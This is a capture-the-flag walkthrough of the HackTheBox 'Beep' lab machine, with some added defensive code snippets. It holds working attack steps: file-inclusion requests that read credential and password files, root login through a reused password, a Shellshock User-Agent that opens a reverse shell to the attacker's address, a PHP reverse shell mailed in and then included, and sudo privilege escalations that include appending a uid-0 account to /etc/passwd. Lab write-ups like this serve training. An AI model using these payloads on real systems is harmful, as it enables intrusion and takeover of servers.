HackTheBox - Beep Walkthrough
Jul 19, 2019
Easy Linux box with lots of paths to root - LFI with password reuse, LFI to RCE via mail, Shellshock and so on.
1. Recon and Information gathering
Nmap
root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -oN base_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-17 20:25 EEST
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: EXPIRE(NEVER) APOP LOGIN-DELAY(0) TOP STLS RESP-CODES USER PIPELINING AUTH-RESP-CODE UIDL IMPLEMENTATION(Cyrus POP3 server v2)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: ID LITERAL+ ATOMIC CATENATE CHILDREN X-NETSCAPE CONDSTORE LISTEXT URLAUTHA0001 IMAP4 LIST-SUBSCRIBED NO IDLE OK SORT=MODSEQ STARTTLS THREAD=REFERENCES MAILBOX-REFERRALS MULTIAPPEND IMAP4rev1 NAMESPACE ANNOTATEMORE RENAME SORT BINARY UNSELECT RIGHTS=kxte THREAD=ORDEREDSUBJECT ACL QUOTA UIDPLUS Completed
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2019-07-17T17:23:25+00:00; -4m57s from scanner time.
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
Host script results:
|_clock-skew: -4m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 290.44 seconds
A scan of all ports additionally turned up some less common open ports:
879/tcp open unknown
4190/tcp open sieve
4559/tcp open hylafax
5038/tcp open unknown
Let’s get some more info on them:
root@kali:/vagrant/hackthebox/beep# nmap -sV -sC 10.10.10.7 -p 879,4190,4559,5038 -oN more_tcp.nmap
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-07-18 13:14 EEST
Nmap scan report for beep.htb (10.10.10.7)
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
879/tcp closed unknown
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
Service Info: Host: localhost; OS: Unix
Services
HTTP
So I have an “Elastix” app - no idea what it is. Let’s google a bit and see if there’s something interesting.
Okay, so it’s PBX software - mail, calls, etc. And dirbusting shows a lot of directories - roundcube, voicemail login, various dirs without indexes, etc.
root@kali:/vagrant/hackthebox/beep# gobuster dir -w /opt/wordlists/directory-medium.txt -u https://10.10.10.7 -k -t 50 -x php,txt,zip
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.7
[+] Threads: 50
[+] Wordlist: /opt/wordlists/directory-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,zip
[+] Timeout: 10s
===============================================================
2019/07/17 21:37:19 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/index.php (Status: 200)
/register.php (Status: 200)
/modules (Status: 301)
/themes (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/config.php (Status: 200)
/robots.txt (Status: 200)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
<...>
searchsploit also lists some vulns, but I need to check whether they apply:
root@kali:/vagrant/hackthebox/beep# searchsploit elastix
Exploit Title | Path (/opt/exploitdb/)
Elastix - 'page' Cross-Site Scripting | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution | exploits/php/webapps/18650.py
Asterisk
The VoIP service has quite a list of vulns; I have to check whether they apply to the version the server runs.
root@kali:/vagrant/hackthebox/beep# searchsploit Asterisk
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Asterisk 'asterisk-addons' 1.2.7/1.4.3 - CDR_ADDON_MYSQL Module SQL Injection | exploits/linux/remote/30677.pl
Asterisk - 'ast_parse_digest()' Stack Buffer Overflow (PoC) | exploits/linux/dos/18855.txt
Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access | exploits/cgi/webapps/26475.txt
Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC) | exploits/multiple/dos/2597.pl
Asterisk 1.2.15/1.4.0 - Remote Denial of Service | exploits/multiple/dos/3407.c
Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service | exploits/multiple/dos/3566.pl
Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash | exploits/multiple/dos/5749.pl
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (1) | exploits/multiple/dos/29900.txt
Asterisk 1.4 SIP T.38 SDP - Parsing Remote Stack Buffer Overflow (PoC) (2) | exploits/multiple/dos/29901.txt
Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities | exploits/linux/dos/31440.txt
Asterisk 1.6 IAX - 'POKE' Requests Remote Denial of Service | exploits/linux/dos/32095.pl
Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration | exploits/linux/remote/35801.txt
Asterisk 1.8.x - SIP INVITE Request User Enumeration | exploits/multiple/remote/35685.txt
Asterisk 1.x - BYE Message Remote Denial of Service | exploits/multiple/dos/30974.txt
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption | exploits/multiple/dos/43992.py
Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash | exploits/multiple/dos/4249.rb
Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service | exploits/multiple/dos/4196.c
Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service) | exploits/multiple/dos/8940.pl
Asterisk PBX 0.7.x - Multiple Logging Format String Vulnerabilities | exploits/linux/remote/24221.pl
Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure | exploits/multiple/remote/27716.txt
Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities | exploits/multiple/remote/34301.txt
Asterisk chan_pjsip 15.2.0 - 'INVITE' Denial of Service | exploits/linux/dos/44181.py
Asterisk chan_pjsip 15.2.0 - 'SDP fmtp' Denial of Service | exploits/linux/dos/44183.py
Asterisk chan_pjsip 15.2.0 - 'SDP' Denial of Service | exploits/linux/dos/44182.py
Asterisk chan_pjsip 15.2.0 - 'SUBSCRIBE' Stack Corruption | exploits/linux/dos/44184.py
Asteriskguru Queue Statistics - 'warning' Cross-Site Scripting | exploits/php/webapps/38375.txt
Fonality trixbox - 'asterisk_info.php' Directory Traversal | exploits/php/webapps/39349.txt
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Webmin
For Webmin there is Shellshock to try (hello, CGI!).
2. Initial foothold/low priv access.
The easiest way is the LFI vuln in vtigercrm (exploits/php/webapps/37637.pl):
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action
HTTP/1.1 200 OK
Date: Fri, 19 Jul 2019 13:12:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13779
AMPDBHOST=localhost
AMPDBENGINE=mysql
AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
AMPBIN=/var/lib/asterisk/bin
AMPSBIN=/usr/local/sbin
AMPWEBROOT=/var/www/html
AMPCGIBIN=/var/www/cgi-bin
FOPWEBROOT=/var/www/html/panel
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
AUTHTYPE=database
ASTETCDIR=/etc/asterisk
ASTMODDIR=/usr/lib/asterisk/modules
ASTVARLIBDIR=/var/lib/asterisk
ASTAGIDIR=/var/lib/asterisk/agi-bin
ASTSPOOLDIR=/var/spool/asterisk
ASTRUNDIR=/var/run/asterisk
ASTLOGDIR=/var/log/asterisk
Sorry! Attempt to access restricted file.
https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.
https://10.10.10.7//vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action
<...>
Sorry! Attempt to access restricted file.
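As an added example (not vtiger's or Elastix's code), this is how a language-pack parameter like current_language should be resolved so that none of the three request tricks above gets through: the %00 truncation, the ../ chain and the doubled slash. LANG_DIR, the ALLOWED set and the .lang.php suffix are assumptions for illustration.

```python
import os
import re

# Assumed layout and installed packs; the real vtiger paths are not on the page.
LANG_DIR = "/var/www/html/vtigercrm/include/language"
ALLOWED = {"en_us", "de_de", "es_es"}
NAME_RE = re.compile(r"^[a-z]{2}_[a-z]{2}$")


def check_language(value):
    """Return (ok, reason) for a user-supplied current_language value.

    Validation happens before any path is built, so the NUL byte that
    truncated the appended suffix, the '../' chain that walked up to /etc
    and the doubled slash are all rejected by the name rule alone.
    """
    if "\x00" in value:
        return False, "NUL byte in language name"
    if not NAME_RE.match(value):
        return False, "name is not of the form xx_yy"
    if value not in ALLOWED:
        return False, "language pack not installed"
    return True, "ok"


def resolve_language(value):
    """Map a validated name to its file and confirm the canonical path is
    still under LANG_DIR (defence in depth against symlinks or a later
    loosening of the name rule)."""
    ok, reason = check_language(value)
    if not ok:
        raise ValueError(reason)
    base = os.path.realpath(LANG_DIR)
    path = os.path.realpath(os.path.join(base, value + ".lang.php"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("resolved path escapes the language directory")
    return path
```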
Tried connecting to mysql with the credentials I found with the LFI, but no luck:
root@kali:/vagrant/hackthebox/beep# mysql -u asteriskuser -h 10.10.10.7 -p
Enter password:
ERROR 1130 (HY000): Host '10.10.14.25' is not allowed to connect to this MySQL server
aand… trying the users from /etc/passwd over SSH with the passwords found via the LFI, I get a match for root:
root@kali:/vagrant/hackthebox/beep# ssh root@10.10.10.7
root@10.10.10.7's password:
Last login: Tue Jul 16 11:45:47 2019
Welcome to Elastix
----------------------------------------------------
To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@beep ~]# cat /root/root.txt
<...>
Damn password reuse :/
Shellshock
I modified the User-Agent and used the /dev/tcp shell for a blind Shellshock:
GET / HTTP/1.1
Host: 10.10.10.7:10000
User-Agent: () { :;}; bash -i >& /dev/tcp/10.10.14.25/4848 0>&1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ARI=r5hkca7mh8ln12n4la4o8neat1; PHPSESSID=737p48sdv47673q4m1l3mlppd7; elastixSession=3lj6vt1946kqiliifee0655ra2; testing=1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
root@kali:/vagrant/hackthebox/beep# nc -lvnp 4848
listening on [any] 4848 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 58740
bash: no job control in this shell
[root@beep webmin]# id
uid=0(root) gid=0(root)
SMTP + LFI
Maybe the coolest way to pwn the box - ofc thanks to ippsec:
root@kali:/vagrant/hackthebox/beep# sendemail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s 10.10.10.7:25 -f flame_n@htb.eu
Jul 19 15:12:14 kali sendemail[11143]: Email was sent successfully!
Start a netcat listener, then open https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action
aaand - profit!
root@kali:/vagrant/hackthebox/beep# nc -lvnp 4949
listening on [any] 4949 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.7] 35358
Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
22:08:39 up 5:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
sh: no job control in this shell
sh-3.2$
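Added detection example, not from the walkthrough: a small access-log scanner that tags the three request patterns shown above, the graph.php traversal with %00, the mail-spool include and the Shellshock User-Agent sent to Webmin. The log lines are constructed in Apache combined format, and the Webmin hit is assumed to be logged the same way.

```python
import re
from urllib.parse import unquote

# Constructed log lines modelled on the requests in this walkthrough; IPs,
# sizes and timestamps are made up.
SAMPLE_LOG = """\
10.10.14.25 - - [19/Jul/2019:13:12:58 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../../etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 13779 "-" "Mozilla/5.0"
10.10.14.25 - - [19/Jul/2019:13:20:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.25 - - [19/Jul/2019:13:30:11 +0000] "GET / HTTP/1.1" 200 1200 "-" "() { :;}; bash -i >& /dev/tcp/10.10.14.25/4848 0>&1"
10.10.14.30 - - [19/Jul/2019:13:31:00 +0000] "GET /index.php HTTP/1.1" 200 3210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Shellshock trigger: an exported function body "() { ...; }" followed by ";".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def tag_request(uri, ua):
    """Return detection tags for one request ([] when nothing matched)."""
    uri = unquote(unquote(uri))  # decode twice so %2500 / %252e cannot hide
    tags = []
    if "\x00" in uri:
        tags.append("null-byte")        # the %00 that truncates the include
    if "../" in uri or "..\\" in uri:
        tags.append("traversal")        # the ../../ chain up to /
    if "/etc/" in uri or "/var/spool/mail/" in uri:
        tags.append("sensitive-path")   # amportal.conf, passwd, mail spool
    if SHELLSHOCK_RE.search(ua):
        tags.append("shellshock-ua")
    return tags


def scan(log_text):
    """Return (ip, timestamp, tags) for every line that raised a tag."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := tag_request(m["uri"], m["ua"])):
            alerts.append((m["ip"], m["ts"], tags))
    return alerts
```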
3. Privilege Escalation
sudo -l shows that user asterisk may run the following commands on this host:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /usr/bin/nmap
(root) NOPASSWD: /usr/bin/yum
(root) NOPASSWD: /bin/touch
(root) NOPASSWD: /bin/chmod
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /sbin/service
(root) NOPASSWD: /sbin/init
(root) NOPASSWD: /usr/sbin/postmap
(root) NOPASSWD: /usr/sbin/postfix
(root) NOPASSWD: /usr/sbin/saslpasswd2
(root) NOPASSWD: /usr/sbin/hardware_detector
(root) NOPASSWD: /sbin/chkconfig
(root) NOPASSWD: /usr/sbin/elastix-helper
Okay… lots of tricks here… nmap, chown, chmod, etc.:
Chown
bash-3.2$ sudo chown asterisk:asterisk /etc/passwd
bash-3.2$ echo "flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash" >> /etc/passwd
bash-3.2$ su - flame
Password: flamen
[root@beep ~]# id
uid=0(root) gid=0(root) groups=0(root)
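Added example, not part of the walkthrough: an audit that flags what the chown trick leaves behind in /etc/passwd, plus the ownership check that would have caught the chown itself. The passwd excerpt is constructed from the listing above plus the appended line.

```python
# Constructed excerpt: a few stock entries from the LFI output plus the
# "flame" line that the chown/echo step appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
flame:sa/zAjIC0QWtk:0:0::/root/:/bin/bash
"""

SHADOWED = {"x", "*", "!", "!!"}  # markers meaning "hash lives in /etc/shadow"


def audit_passwd(text):
    """Return a list of (user, finding) pairs for suspicious entries."""
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, pw, uid, _gid, _gecos, home, shell = fields
        if name in seen:
            findings.append((name, "duplicate username"))
        seen.add(name)
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in SHADOWED:
            findings.append((name, "password hash stored in passwd, not shadow"))
        if name != "root" and home.rstrip("/") == "/root" and shell != "/sbin/nologin":
            findings.append((name, "login account with home in /root"))
    return findings


def passwd_ownership_ok(st_uid, st_gid, st_mode):
    """/etc/passwd must stay root-owned and not group/world writable;
    'sudo chown asterisk:asterisk /etc/passwd' breaks exactly this."""
    return st_uid == 0 and st_gid == 0 and (st_mode & 0o022) == 0
```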
Nmap
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Service
bash-3.2$ sudo /sbin/service ../../../bin/bash
[root@beep /]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
And so on; for more, check out the good folks at https://gtfobins.github.io/.
Overall a cool machine - easy, but still a great playground for testing different paths to root.